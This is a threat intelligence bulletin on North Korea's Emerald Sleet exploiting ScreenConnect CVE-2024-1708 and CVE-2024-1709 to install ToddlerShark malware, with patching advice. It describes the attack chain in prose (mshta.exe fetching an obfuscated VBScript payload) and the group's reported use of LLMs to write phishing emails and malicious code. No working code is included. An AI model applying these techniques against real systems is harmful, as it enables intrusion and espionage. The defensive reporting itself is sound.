Home / Threat Intelligence bulletins / North Korea state-aligned cyber actors exploit ScreenConnect flaw to deploy ToddlerShark malware

Target Industry

Managed Service Providers, and organisations using ConnectWise ScreenConnect for remote access.


Two security flaws, tracked as CVE-2024-1708 and CVE-2024-1709 released by ScreenConnect (ConnectWise), have been actively targeted by the North Korean nation state-sponsored group, tracked as Emerald Sleet (also known as Kimsuky). Exploitation of the common vulnerability exposures (CVEs) has allowed the Pyongyang state-aligned threat actors to exploit authentication bypass and remote code execution flaws, resulting in them infecting targets with a new malware variant, tracked as “ToddlerShark”.

Attack Chain

The threat actor gains access by exploiting the setup wizard for ScreenConnect application. Hands on Keyboard access is then leveraged by accessing cmd.exe to execute mshta.exe to connect to a URL with Visual Basic (VB) malware. Obfuscated VB Script payload download is initiated by MSHTA utility, whereby the downloads are dynamic as the malware is polymorphic, meaning no two file hashes are the same.


Successful exploitation of CVE-2024-1708 and CVE-2024-1709 would likely allow threat actors to bypass authentication using an alternate path or channel, leading to the infection of the host. Further malicious operations could subsequently be performed, including data and information gathering, and exfiltration to the attacker’s command-and-control (C2) infrastructure.

Vulnerability Detection

ScreenConnect has released security updates for the vulnerabilities reported on regarding the affected product versions and, as such, previous versions are now vulnerable to potential exploitation.

Affected Products

CVE-2024-1708 and CVE-2024-1709 have been discovered to affect ScreenConnect 23.9.7 and prior versions.

Containment, Mitigations & Remediations

It is strongly recommended that users apply the relevant security patches as soon as possible and as a matter of urgency or discontinue the use of the product if mitigations are unavailable. Systems running versions of ScreenConnect 23.9.7 and prior should be assumed as being compromised even after patching.

Indicators of Compromise

No specific Indicators of Compromise (IoCs) are available currently. However, when further intelligence becomes available, this will be updated.

Threat Landscape

ScreenConnect occupies a significant proportion of the professional services automation (PSA) and remote monitoring and management (RMM) software market share. Given that threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to focus on, ScreenConnect products have become a prime target for threat actors throughout Q1 2024. Due to the fact that such software has become an integral aspect of both business operations across the industry spectrum, threat actors will continue to exploit vulnerabilities contained within the associated products in an attempt to extract the sensitive information contained therein.

This exploitation highlights the ongoing risk associated with software vulnerabilities, particularly with the prevalent use of remote access tools by individuals and organisations. Because people will continue to work remotely, it’s expected that such attacks will still be widely used. Organisations need to manage their vulnerabilities quickly and deal with such incidents in a timely fashion.

Threat Actor

Emerald Sleet has been active since at least 2012 and primarily targets governments, nuclear organisations, and foreign relations entities to collect intelligence that furthers North Korea’s state interests. The advanced persistent threat (APT) unit started by targeting South Korean government entities and think tanks before expanding their target list to include organisations in any sector in Europe, Russia, and the US.

The Pyongyang-aligned threat actor group is known for leveraging spear-phishing campaigns with backdoor malware as their main tactic. Recent intelligence indicates that Emerald Sleet has been linked to the utilisation of large language models (LLMs) for crafting phishing emails and generating malicious code.

Most recently, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has sanctioned Emerald Sleet for its cyber espionage efforts in supporting North Korea’s strategic objectives.